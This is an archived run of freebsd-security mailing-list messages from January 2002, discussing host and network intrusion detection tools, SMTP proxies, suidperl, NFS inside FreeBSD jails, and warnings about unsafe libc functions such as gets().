From owner-freebsd-security Sun Jan 13 9:55:38 2002
From: Simon Siemonsma
To: freebsd-security@freebsd.org
Subject: Which intrusion detection to use?
Date: Sun, 13 Jan 2002 19:00:30 +0000

I have a FreeBSD box at home which I primarily use for internet access.
All unnecessary daemons are switched off (I have inetd turned off) and I make
use of IPFW.
To even increase the security more I want to add a few things:
1. software that warns me when I'm under attack. I understood snort is a
Network based Intrusion Detection System (NIDS), so not useful on a host.
What are the alternatives on a host? I did read about portsentry but don't
understand what the added benefit is over a tightly configured firewall. I
mean I use stateful packet filtering, allowing connections to be built up
from me to the internet and not the other way round. Further my ports are
stealthed.
2. software which will detect that I'm hacked. Tripwire is a well-known name,
but AIDE claims to do more. Integrit claims to be simpler and focus on the
essentials.

Does anyone have some recommendations for me.
Other recommendations to increase my security are also welcome?
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Sun Jan 13 10:38:45 2002
From: "Dave Raven"
To: "Simon Siemonsma"
Subject: Re: Which intrusion detection to use?
Date: Sun, 13 Jan 2002 20:35:25 +0200

Snort is probably what you're looking for. I wouldn't recommend running
portsentry as it can lead to fairly dangerous DoS. Tripwire and AIDE are good
products; read up on them to decide.

I think you're going overboard. If you default deny anything in and have no
unsafe things running what are you worried about? Just tail -f your firewall
logs.

----- Original Message -----
From: "Simon Siemonsma"
Sent: Sunday, January 13, 2002 9:00 PM
Subject: Which intrusion detection to use?

> I have a FreeBSD box at home which I primarily use for internet access.
> All unnecessary daemons are switched off (I have inetd turned off) and I make
> use of IPFW.
> To even increase the security more I want to add a few things:
> 1. software that warns me when I'm under attack. I understood snort is a
> Network based Intrusion Detection System (NIDS), so not useful on a host.
> What are the alternatives on a host? I did read about portsentry but don't
> understand what the added benefit is over a tightly configured firewall. I
> mean I use stateful packet filtering, allowing connections to be built up
> from me to the internet and not the other way round. Further my ports are
> stealthed.
> 2. software which will detect that I'm hacked. Tripwire is a well-known name,
> but AIDE claims to do more. Integrit claims to be simpler and focus on the
> essentials.
>
> Does anyone have some recommendations for me.
> Other recommendations to increase my security are also welcome?

From owner-freebsd-security Sun Jan 13 11:34:11 2002
From: admin
To: Simon Siemonsma
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Which intrusion detection to use?
Date: Sun, 13 Jan 2002 13:27:01 -0600 (CST)

Check out Veracity...I use snort and aide and tripwire on different
machines, and Veracity has piqued my interest just lately due to a post from
here.
I will be giving it a trial run myself pretty soon. Here is where you
can find it....

Have a look at http://www.freeveracity.org

Let us know if you do use it, it's supposed to work very well on bsd.

--emacs

On Sun, 13 Jan 2002, Simon Siemonsma wrote:

> I have a FreeBSD box at home which I primarily use for internet access.
> All unnecessary daemons are switched off (I have inetd turned off) and I make
> use of IPFW.
> To even increase the security more I want to add a few things:
> 1. software that warns me when I'm under attack. I understood snort is a
> Network based Intrusion Detection System (NIDS), so not useful on a host.
> What are the alternatives on a host? I did read about portsentry but don't
> understand what the added benefit is over a tightly configured firewall. I
> mean I use stateful packet filtering, allowing connections to be built up
> from me to the internet and not the other way round. Further my ports are
> stealthed.
> 2. software which will detect that I'm hacked. Tripwire is a well-known name,
> but AIDE claims to do more. Integrit claims to be simpler and focus on the
> essentials.
>
> Does anyone have some recommendations for me.
> Other recommendations to increase my security are also welcome?
From owner-freebsd-security Sun Jan 13 12: 8:34 2002
From: Krzysztof Zaraska
To: freebsd-security@freebsd.org
Subject: Re: Which intrusion detection to use?
Date: Sun, 13 Jan 2002 21:08:09 +0100

On Sun, 13 Jan 2002 19:00:30 +0000
Simon Siemonsma wrote:

> I have a FreeBSD box at home which I primarily use for internet access.
> All unnecessary daemons are switched off (I have inetd turned off) and I make
> use of IPFW.
> To even increase the security more I want to add a few things:
> 1. software that warns me when I'm under attack. I understood snort is a
> Network based Intrusion Detection System (NIDS), so not useful on a host.

Wrong.
This term simply means that it will sniff your network (i.e. connection
to your ISP) and alert you when it sees a packet that matches a known attack
signature. So yes, you can run it on a single host. Be warned, however, that
Snort can generate false positives: e.g. it can report that you are being
exploited with an unknown exploit while FTP'ing a new release of FreeBSD,
because some archives have strings of 0x70's in them, which triggers an alert.

> What are the alternatives on a host?

To clean up terminology: a host-based IDS is AIDE, since it monitors changes
on the host. Snort is network-based since it monitors the network. A hybrid IDS
monitors both.

> I did read about portsentry but don't
> understand what the added benefit is over a tightly configured firewall.

I don't know how tight your particular setup is, but if you deny access to
all unused ports to the world there will be no use in PortSentry since the
offending packets will never hit the port PortSentry is listening on. Snort
does not care about firewalls, so just tell it to listen on the outside
interface and you're set.

> I
> mean I use stateful packet filtering, allowing connections to be built up
> from me to the internet and not the other way round.

You mean you have no services available from outside? Well, duh, not much
can be hacked here anyhow, unless there is some exploit for the kernel we
don't know of I guess...

> Further my ports are
> stealthed.

This doubles the functionality of the firewall, but may be useful if you
switch your firewall off for debugging etc. A nice example of 'layer
security'. :)

> 2. software which will detect that I'm hacked. Tripwire is a well-known name,
> but AIDE claims to do more.

Personally I use AIDE and I find it to be quite OK. After setting up AIDE I
made an MD5 checksum of the database. I keep this checksum offsite and
compare it against the current checksum to be sure that no one tampered
with the database :)

> Integrit claims to be simpler and focus on the
> essentials.
Haven't tested. However all these tools operate on the same principles...

> Does anyone have some recommendations for me.

If this is a NAT gateway that has all ports firewalled from the outside I'd
be satisfied with the steps described above. Just re-check your firewall
rules, since it's your most important line of defense.

You may however (it's your system, anyhow ;-)) consider raising your
securelevel and making some files immutable (binaries, configuration) and
some other append-only (logs). man securelevel for details.

> Other recommendations to increase my security are also welcome?

Well, there are some papers on the subject available on the net, so just do
a Google search :) but they mostly focus on multi-user systems and servers.
Actually simple setup == less possible points of entry.

I'm afraid that if you exaggerate you may end up with a system generating
tons of logs although nothing serious is happening.

Best regards,
Krzysztof

From owner-freebsd-security Sun Jan 13 16:37:24 2002
From: André Videira
Subject:
Date: Sun, 13 Jan 2002 22:36:03 -0200

unsubscribe freebsd-security andre@institutotreinar.com.br

From owner-freebsd-security Sun Jan 13 17:17:40 2002
From: Chris BeHanna
Subject: Re: smtpproxy
Date: Sun, 13 Jan 2002 20:17:22 -0500 (EST)

On Sat, 12 Jan 2002, Nicolas Rachinsky wrote:

> I'm looking for a smtpproxy or something similar to accept mails via
> smtp on the firewall and forward them to the internal sendmail.
>
> It should be as simple as possible, there would be very low traffic
> some mails per day (some mails per hour maximum). And there should be no
> exploitable bugs, of course ;-)
>
> I'm looking for such a thing because I don't want to expose the
> internal sendmail to the bad outside world.

You will lose the anti-spam capabilities of sendmail in the
process. To me, those are of considerable value.

Others have pointed out postfix, smtpd, smapd, and the like. If
you're really hard-up and don't like any of those, then you need to
write your own smtpd.
In concept it's easy, but getting it tight and
secure is the hard part.

--
Chris BeHanna
Software Engineer (Remove "bogus" before responding.)
behanna@bogus.zbzoom.net
I was raised by a pack of wild corn dogs.

From owner-freebsd-security Mon Jan 14 1:27:17 2002
From: Sheldon Hearn
To: Rik
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: suidperl
Date: Mon, 14 Jan 2002 11:29:23 +0200

On Sun, 13 Jan 2002 00:28:22 GMT, Rik wrote:

> Which raises the question, what use is suidperl without the suid bit? I
> can't recall ever having used it, and I can't recall any scripts I know
> of that use it... so, uhm, what's the point?

It's provided so that folks don't have to build any software to make it
available. They just have to make it setuid root.

Ciao,
Sheldon.
From owner-freebsd-security Mon Jan 14 1:37:45 2002
From: Bart Matthaei
To: Rik
Cc: freebsd-security@freebsd.org
Subject: Re: suidperl
Date: Mon, 14 Jan 2002 10:37:33 +0100

On Sun, Jan 13, 2002 at 12:28:22AM +0000, Rik wrote:
> Which raises the question, what use is suidperl without the suid bit? I
> can't recall ever having used it, and I can't recall any scripts I know
> of that use it... so, uhm, what's the point?

It used to be suid on linux distros. Until some critical vulnerabilities
were found.

suidperl is useful for maintenance scripts that are called by normal users
(or, for instance, the www-user, if the script is called from a web-based
maintenance system).
Regards,

Bart

--
Bart Matthaei
bart@dreamflow.nl

"The whacky morning DJ says democracy's a joke"

From owner-freebsd-security Mon Jan 14 5: 5: 7 2002
From: zhuravlev alexander
To: security@freebsd.org
Subject: jail and NFS
Date: Mon, 14 Jan 2002 16:04:56 +0300

hello
is it possible in jailed box mount nfs shares ?

thanks.
sorry if this is not correct list to post this message.
--
zhuravlev alexander
u l s t u c t c
e-mail:zaa@ulstu.ru

From owner-freebsd-security Mon Jan 14 6:19:40 2002
From: Steve Shorter
To: zhuravlev alexander
Cc: security@freebsd.org
Subject: Re: jail and NFS
Date: Mon, 14 Jan 2002 09:13:48 -0500

On Mon, Jan 14, 2002 at 04:04:56PM +0300, zhuravlev alexander wrote:
> hello
> is it possible in jailed box mount nfs shares ?

I run apache in a jail with homedir mounted NFS
No. Problem.

The homedir are visible from the jail but the network
they are mounted across isn't. Cool!
-steve

From owner-freebsd-security Mon Jan 14 6:42:43 2002
From: Robert Watson
To: zhuravlev alexander
Cc: security@freebsd.org
Subject: Re: jail and NFS
Date: Mon, 14 Jan 2002 09:42:26 -0500 (EST)

If the NFS mount is visible in the jail's namespace, then the jailed
processes can access it subject to normal access control restrictions.
However, processes in jail are not permitted to mount, remount, or unmount
filesystems, so any access to NFS must be configured by a process outside
the jail (and preferably, before any untrusted processes run in the jail,
so as to prevent racing and path-based games). Typically, when using NFS
with a jail, I'll do the NFS mounting prior to actually starting the jail.

Robert N M Watson             FreeBSD Core Team, TrustedBSD Project
robert@fledge.watson.org      NAI Labs, Safeport Network Services

On Mon, 14 Jan 2002, zhuravlev alexander wrote:

> hello
> is it possible in jailed box mount nfs shares ?
>
> thanks.
> sorry if this is not correct list to post this message.
>
> --
> zhuravlev alexander
> u l s t u c t c
> e-mail:zaa@ulstu.ru

From owner-freebsd-security Mon Jan 14 6:47: 9 2002
From: "Haikal Saadh"
To: "'Krzysztof Zaraska'"
Subject: RE: Which intrusion detection to use?
Date: Mon, 14 Jan 2002 19:46:38 +0500

*snip*

> I don't know how tight your particular setup is, but if you
> deny access to all unused ports to the world there will be no
> use in PortSentry since the offending packets will never hit
> the port PortSentry is listening on. Snort does not care
> about firewalls, so just tell it to listen on outside
> interface and you're set.
>

I have been thinking about this a bit lately. I am (was until I broke it
this morning upgrading to 1.8.3, blast it!) running snort and ipfw, and
while I would get ipfw dropping packets in my logs, I have nothing in my
snort alerts from my outside network.
(Quite a few from the inside
though, mostly malformed NetBIOS packets and other mostly harmless (as
far as I'm concerned) traffic).

My firewall policy is default deny, but with dynamic rules so that I can
actually use stuff. My snort's HOMENET is set to any, and I'm on dialup.

What I'd like someone to clarify for me is:
Is snort actually seeing incoming packets on my outside interface, and
I've been really lucky so far
OR
Is snort not hearing anything on my outside interface? (tun0)

What you've said above suggests the former, but I would appreciate it if
someone confirms my suspicions.

*snip*

>
> > Does anyone have some recommendations for me.
> If this is a NAT gateway that has all ports firewalled from
> the outside I'd be satisfied with the steps described above.
> Just re-check your firewall rules, since it's your most
> important line of defense.
>
> You may however (it's your system, anyhow ;-)) consider
> raising your securelevel and making some files immutable
> (binaries, configuration) and some other append-only (logs).
> man securelevel for details.
>
> > Other recommendations to increase my security are also welcome?

If you want a good book I'd recommend "Building Internet Firewalls" by
Zwicky et al, published by O'Reilly and Associates.

Also for inspiration, look at:
A) /etc/login.access
B) /etc/hosts.allow
C) /etc/login.conf
D) running daemons (like bind, sendmail, and even snort, among others) as
their own user/group, and _NOT_ root.wheel.

> Well, there are some papers on the subject available on the
> net, so just do a Google search :) but they mostly focus on
> multi-user systems and servers. Actually simple setup == less
> possible points of entry.
>
> I'm afraid that if you exaggerate you may end up with a
> system generating tons of logs although nothing serious is happening.
From owner-freebsd-security Mon Jan 14 7:27: 9 2002
From: Krzysztof Zaraska
To: "Haikal Saadh"
Cc: freebsd-security@freebsd.org
Subject: Re: Which intrusion detection to use?
Date: Mon, 14 Jan 2002 16:26:52 +0100

On Mon, 14 Jan 2002 19:46:38 +0500
"Haikal Saadh" wrote:

> *snip*
>
> > I don't know how tight your particular setup is, but if you
> > deny access to all unused ports to the world there will be no
> > use in PortSentry since the offending packets will never hit
> > the port PortSentry is listening on. Snort does not care
> > about firewalls, so just tell it to listen on outside
> > interface and you're set.
> >
>
> I have been thinking about this a bit lately. I am (was until I broke it
> this morning upgrading to 1.8.3, blast it!) running snort and ipfw, and
> while I would get ipfw dropping packets in my logs, I have nothing in my
> snort alerts from my outside network. (Quite a few from the inside
> though, mostly malformed NetBIOS packets and other mostly harmless (as
> far as I'm concerned) traffic).
>
> My firewall policy is default deny, but with dynamic rules so that I can
> actually use stuff. My snort's HOMENET is set to any, and I'm on dialup.
>
>
> What I'd like someone to clarify for me is:
> Is snort actually seeing incoming packets on my outside interface, and
> I've been really lucky so far
> OR
> Is snort not hearing anything on my outside interface? (tun0)

From my experience snort will not catch much in this setup. If you deny
anything you are virtually invisible for kiddiez out there. They usually
sweep large networks looking for alive hosts and then look closer at those
who are alive. But if you deny everything you are a dead host for them.
These sweep scans are not detected by snort, since it does not trigger on
a single SYN or PING packet. And you do not have any services running, so no
exploits are tried on you.

Snort is libpcap based, so if tcpdump -i tun0 works for you snort should
see packets also...

There is a simple test: just portscan your box from the remote computer.
This should trigger an alert.

[...]
Krzysztof

From owner-freebsd-security Mon Jan 14 7:30:30 2002
From: Lee Brotherston
To: 'Haikal Saadh', 'Krzysztof Zaraska', freebsd-security@freebsd.org
Subject: RE: Which intrusion detection to use?
Date: Mon, 14 Jan 2002 15:29:59 -0000

| What I'd like someone to clarify for me is:
| Is snort actually seeing incoming packets on my outside interface, and
| I've been really lucky so far
| OR
| Is snort not hearing anything on my outside interface? (tun0)

Have you tried waiting until the dialup connection is established then
running snort with:

-i tun0

This specifies which interface to listen on. You will of course not see any
traffic on your local lan anymore, as it will not be sniffing the interface
connected to your hub/switch. It should however pick up the inbound traffic
and any local traffic that goes out over the interface.

If you want to get paranoid run snort on all interfaces and compare the
results :)

Normally you need to run an instance per interface, unless you're using a
linux 2.1.x/2.2.x kernel.
If you are you might want to see http://www.snort.org/docs/faq.html#3.4 Thanks Lee -- Lee Brotherston - IP Security Manager, Easynet Ltd http://www.easynet.net/ Phone: +44 20 7900 4444 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 14 8:24:40 2002 Delivered-To: freebsd-security@freebsd.org Received: from smtp018.mail.yahoo.com (smtp018.mail.yahoo.com [216.136.174.115]) by hub.freebsd.org (Postfix) with SMTP id B5A6D37B404 for ; Mon, 14 Jan 2002 08:24:27 -0800 (PST) Received: from unknown (HELO warhawk) (202.1.200.64) by smtp.mail.vip.sc5.yahoo.com with SMTP; 14 Jan 2002 16:24:24 -0000 From: "Haikal Saadh" To: "'Lee Brotherston'" , "'Krzysztof Zaraska'" , Subject: RE: Which intrusion detection to use? Date: Mon, 14 Jan 2002 21:24:09 +0500 Message-ID: <000001c19d17$ec59c7c0$40c801ca@warhawk> X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.2616 In-reply-to: <7052044C7D7AD511A20200508B5A9C58516AF7@MAGRAT> X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > -----Original Message----- > From: Lee Brotherston [mailto:lee.brotherston@uk.easynet.net] > Sent: Monday, January 14, 2002 8:30 PM > To: 'Haikal Saadh'; 'Krzysztof Zaraska'; freebsd-security@freebsd.org > Subject: RE: Which intrusion detection to use? > > > > | What I'd like to someone to clarify for me is: > | Is snort actually seeing incoming packets on my outside > interface, and > | I've been really lucky so far > | OR > | Is snort not hearing anything on my outside interface? (tun0) > > Have you tried waiting until the dialup connection is > established then running snort with: > > -i tun0 > > This specifies which interface to listen on. 
> You will of course not see any traffic on your local lan anymore, as it
> will not be sniffing the interface connected to your
> hub/switch. It should however pick up the inbound traffic and
> any local traffic that goes out over the interface.
>
> If you want to get paranoid run snort on all interfaces and
> compare the results :)
>
> Normally you need to run an instance per interface, unless
> you're using a linux 2.1.x/2.2.x kernel. If you are you
> might want to see http://www.snort.org/docs/faq.html#3.4
>

I suspected that, as a lot of the docco I've read point to people who do
indeed have two instances of snort running. I was, however misled by being
able to set HOMENET to any in snort.conf.

I think I'll add an entry in ppp.linkup to start snort when my modem dials
out.

Thanks for setting me straight on this matter.

_________________________________________________________
Do You Yahoo!?
Get your free @yahoo.com address at http://mail.yahoo.com

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Mon Jan 14 8:27:34 2002
Delivered-To: freebsd-security@freebsd.org
Received: from smtp015.mail.yahoo.com (smtp015.mail.yahoo.com [216.136.173.59])
    by hub.freebsd.org (Postfix) with SMTP id 540E837B41C
    for ; Mon, 14 Jan 2002 08:27:26 -0800 (PST)
Received: from unknown (HELO warhawk) (202.1.200.64)
    by smtp.mail.vip.sc5.yahoo.com with SMTP; 14 Jan 2002 16:27:24 -0000
From: "Haikal Saadh"
To: "'Krzysztof Zaraska'"
Cc:
Subject: RE: Which intrusion detection to use?
Date: Mon, 14 Jan 2002 21:27:11 +0500
Message-ID: <000101c19d18$57401d00$40c801ca@warhawk>
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.2616
In-reply-to: <20020114162652.7ba2a6d4.kzaraska@student.uci.agh.edu.pl>
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Importance: Normal
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

> -----Original Message-----
> From: owner-freebsd-security@FreeBSD.ORG
> [mailto:owner-freebsd-security@FreeBSD.ORG] On Behalf Of
> Krzysztof Zaraska
> Sent: Monday, January 14, 2002 8:27 PM
> To: Haikal Saadh
> Cc: freebsd-security@freebsd.org
> Subject: Re: Which intrusion detection to use?
>
>
> On Mon, 14 Jan 2002 19:46:38 +0500
> "Haikal Saadh" wrote:
>
> > *snip*
> >
> > > I don't know how tight your particular setup is, but if you deny
> > > access to all unused ports to the world there will be no use in
> > > PortSentry since the offending packets will never hit the port
> > > PortSentry is listening on. Snort does not care about firewalls, so
> > > just tell it to listen on outside interface and you're set.
> > >
> >
> > I have been thinking about this a bit lately. I am (was until I broke
> > it this morning upgrading to 1.8.3, blast it!) running snort and ipfw,
> > and while I would get ipfw dropping packets in my logs, I have nothing
> > in my snort alerts from my outside network. (Quite a few from the
> > inside though, mostly malformed NetBIOS packets and other mostly
> > harmless (as far as I'm concerned) traffic).
> >
> > My firewall policy is default deny, but with dynamic rules so that I
> > can actually use stuff. My snort's HOMENET is set to any, and I'm on
> > dialup.
> >
> >
> > What I'd like to someone to clarify for me is:
> > Is snort actually seeing incoming packets on my outside interface, and
> > I've been really lucky so far
> > OR
> > Is snort not hearing anything on my outside interface? (tun0)
> From my experience snort will not catch much in this setup.
> If you deny anything you are virtually invisible for kiddiez
> out there. They usually sweep large networks looking for
> alive hosts and then look closer at those who are alive. But
> if you deny everything you are a dead host for them. These
> sweep scans are not detected by snort, since it does not
> trigger on single SYN or PING packet. And you do not have any
> services running, so no exploits are tried on you.
>
> Snort is libpcap based, so if tcpdump -i tun0 works for you
> snort should see packets also...
>
> There is a simple test: just portscan your box from the
> remote computer. This should trigger alert.
>
> [...]
>

Yah, tcpdump works fine, I used to use it all the time when first setting
up the box to see how squid and bind were behaving. I'll try portscanning
myself from the outside to see what happens when I get back to work
tomorrow.

_________________________________________________________
Do You Yahoo!?
Get your free @yahoo.com address at http://mail.yahoo.com

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Mon Jan 14 9:30:47 2002
Delivered-To: freebsd-security@freebsd.org
Received: from ns.ulstu.ru (ns.ulstu.ru [62.76.34.36])
    by hub.freebsd.org (Postfix) with ESMTP id F09FD37B41E
    for ; Mon, 14 Jan 2002 09:30:35 -0800 (PST)
Received: by ns.ulstu.ru (Postfix-ULSTU, from userid 3909)
    id 44C92107879; Mon, 14 Jan 2002 20:30:32 +0300 (MSK)
Date: Mon, 14 Jan 2002 20:30:32 +0300
From: zhuravlev alexander
To: security@freebsd.org
Subject: Re: jail and NFS
Message-ID: <20020114203031.A59312@ulstu.ru>
Reply-To: zhuravlev alexander
Mail-Followup-To: security@freebsd.org
References: <20020114160455.A44661@ulstu.ru>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 1.0pre2i
In-Reply-To:
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

On Mon, Jan 14, 2002 at 09:42:26AM -0500, Robert Watson wrote:
> If the NFS mount is visible in the jail's namespace, then the jailed
> processes can access it subject to normal access control restrictions.
> However, processes in jail are not permitted to mount, remount, or unmount
> filesystems, so any access to NFS must be configured by a process outside
> the jail (and preferably, before any untrusted processes run in the jail,
> so as to prevent racing and path-based games). Typically, when using NFS
> with a jail, I'll do the NFS mounting prior to actually starting the jail.
>
thank you. i assume that this is right way too.

> Robert N M Watson FreeBSD Core Team, TrustedBSD Project
> robert@fledge.watson.org NAI Labs, Safeport Network Services
>
ps. and as all the time :) sorry for my ugly english :)

--
zhuravlev alexander
u l s t u c t c
e-mail:zaa@ulstu.ru

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Mon Jan 14 9:37:53 2002
Delivered-To: freebsd-security@freebsd.org
Received: from ns.ulstu.ru (ns.ulstu.ru [62.76.34.36])
    by hub.freebsd.org (Postfix) with ESMTP id 35AD837B427
    for ; Mon, 14 Jan 2002 09:37:37 -0800 (PST)
Received: by ns.ulstu.ru (Postfix-ULSTU, from userid 3909)
    id 0BB1E107879; Mon, 14 Jan 2002 20:37:36 +0300 (MSK)
Date: Mon, 14 Jan 2002 20:37:36 +0300
From: zhuravlev alexander
To: security@freebsd.org
Subject: Re: jail and NFS
Message-ID: <20020114203735.A59890@ulstu.ru>
Reply-To: zhuravlev alexander
Mail-Followup-To: security@freebsd.org
References: <20020114160455.A44661@ulstu.ru> <20020114203031.A59312@ulstu.ru>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 1.0pre2i
In-Reply-To: <20020114203031.A59312@ulstu.ru>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

On Mon, Jan 14, 2002 at 08:30:32PM +0300, zhuravlev alexander wrote:
> On Mon, Jan 14, 2002 at 09:42:26AM -0500, Robert Watson wrote:
> > If the NFS mount is visible in the jail's namespace, then the jailed
> > processes can access it subject to normal access control restrictions.
> > However, processes in jail are not permitted to mount, remount, or unmount
> > filesystems, so any access to NFS must be configured by a process outside
> > the jail (and preferably, before any untrusted processes run in the jail,
> > so as to prevent racing and path-based games). Typically, when using NFS
> > with a jail, I'll do the NFS mounting prior to actually starting the jail.
> >
by the way ...
when it type in jailed box
mount
i saw all filesystems and shares mounted by host system
is this correct ?

--
zhuravlev alexander
u l s t u c t c
e-mail:zaa@ulstu.ru

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Mon Jan 14 10:59:57 2002
Delivered-To: freebsd-security@freebsd.org
Received: from khyron.p11.com (khyron.p11.com [64.95.193.74])
    by hub.freebsd.org (Postfix) with ESMTP id DB17A37B405
    for ; Mon, 14 Jan 2002 10:59:52 -0800 (PST)
Received: from rcreasey01 (rcreasey01 [192.168.1.40])
    by khyron.p11.com (Postfix) with ESMTP id DB4D33C55AF
    for ; Mon, 14 Jan 2002 11:01:18 -0800 (PST)
From: "Ryan C. Creasey"
To:
Subject: RE: jail and NFS
Date: Mon, 14 Jan 2002 10:59:52 -0800
Message-ID: <000001c19d2d$a5dae5c0$2801a8c0@office.p11.com>
MIME-Version: 1.0
Content-Type: text/plain; charset="US-ASCII"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.2627
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

> By the way ...
> when it type in jailed box
> mount
> i saw all filesystems and shares mounted by host system
> is this correct ?

As far as I can tell, yes... I have several jails running within my master
environment and there are quite a few ways for a user in the jail to
realize that they're actually in the jail.

root@dolza.p11.com:/usr/ports# mount
/dev/ad0s1a on / (ufs, local)
/dev/ad0s1f on /usr (ufs, local, with quotas)
/dev/ad0s1e on /var (ufs, local)
procfs on /proc (procfs, local)
procfs on /usr/jail/dolza.p11.com/proc (procfs, local)
procfs on /usr/jail/exedore.p11.com/proc (procfs, local)
procfs on /usr/jail/breetai.p11.com/proc (procfs, local)

ps being another one; note the 'J':

root@exedore.p11.com:/etc# ps
  PID  TT  STAT      TIME COMMAND
68462  p9- IJ     0:00.01 /bin/sh /usr/local/bin/safe_mysqld --user=mysql
33488  pc  R+J    0:00.00 ps
58200  pc  SJ     0:00.04 -su (bash)

Although there are ways to "hack" your jail to fake users into believing
they are actually on a real environment. As with the above example, it's
rather trivial to recompile ps by removing the switch for the 'J' flag:

root@dolza.p11.com:/usr/ports# ps
  PID  TT  STAT      TIME COMMAND
32266  p7  I+     0:00.02 -su (bash)
63606  p8- I      0:00.01 /bin/sh /usr/local/bin/safe_mysqld --user=mysql
33487  pd  R+     0:00.00 ps
58217  pd  S      0:00.11 -su (bash)

But there are too many little instances that I seem to overlook. Does
anyone know of a project (freshmeat?) out there that does this? Or am I
just unusual for wanting users to believe they're not in a jail?

Ryan C. Creasey
Network Engineer
p11creative

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Mon Jan 14 14:49:20 2002
Delivered-To: freebsd-security@freebsd.org
Received: from libertad.univalle.edu.co (libertad.univalle.edu.co [200.68.158.11])
    by hub.freebsd.org (Postfix) with ESMTP id 7063337B404
    for ; Mon, 14 Jan 2002 14:49:09 -0800 (PST)
Received: from libertad.univalle.edu.co (buliwyf@localhost.univalle.edu.co [127.0.0.1])
    by libertad.univalle.edu.co (8.12.1/8.12.1) with ESMTP id g0EMuqLB093528
    for ; Mon, 14 Jan 2002 17:56:52 -0500 (COT)
Received: from localhost (buliwyf@localhost)
    by libertad.univalle.edu.co (8.12.1/8.12.1/Submit) with ESMTP id g0EMupXc093525
    for ; Mon, 14 Jan 2002 17:56:51 -0500 (COT)
Date: Mon, 14 Jan 2002 17:56:51 -0500 (COT)
From: Buliwyf McGraw
To: freebsd-security@FreeBSD.ORG
Subject: gets() is unsafe
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

Hi... i was installing several applications (php,xmms,etc) on my
FreeBSD 4.4 server and i got the next message a lot of times when
i was compiling:

/usr/lib/compat/libc.so.3: warning: mktemp() possibly used unsafely; consider using mkstemp()
/usr/lib/compat/libc.so.3: warning: tmpnam() possibly used unsafely; consider using mkstemp()
/usr/lib/compat/libc.so.3: warning: this program uses gets(), which is unsafe.
/usr/lib/compat/libc.so.3: WARNING! setkey(3) not present in the system!
/usr/lib/compat/libc.so.3: WARNING! des_setkey(3) not present in the system!
/usr/lib/compat/libc.so.3: WARNING! encrypt(3) not present in the system!
/usr/lib/compat/libc.so.3: WARNING! des_cipher(3) not present in the system!
/usr/lib/compat/libc.so.3: warning: this program uses f_prealloc(), which is not recommended.

I want to fix this... what i can do?
Thanks for any help.

=======================================================================
Buliwyf McGraw
Administrador del Servidor Libertad
Centro de Servicios de Informacion
Universidad del Valle
=======================================================================

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Mon Jan 14 15:19:59 2002
Delivered-To: freebsd-security@freebsd.org
Received: from elvis.mu.org (elvis.mu.org [192.203.228.196])
    by hub.freebsd.org (Postfix) with ESMTP id 282F537B417
    for ; Mon, 14 Jan 2002 15:19:56 -0800 (PST)
Received: by elvis.mu.org (Postfix, from userid 1192)
    id 0335810DE01; Mon, 14 Jan 2002 15:19:55 -0800 (PST)
Date: Mon, 14 Jan 2002 15:19:55 -0800
From: Alfred Perlstein
To: Buliwyf McGraw
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: gets() is unsafe
Message-ID: <20020114151955.I26067@elvis.mu.org>
References:
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: ; from buliwyf@libertad.univalle.edu.co on Mon, Jan 14, 2002 at 05:56:51PM -0500
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

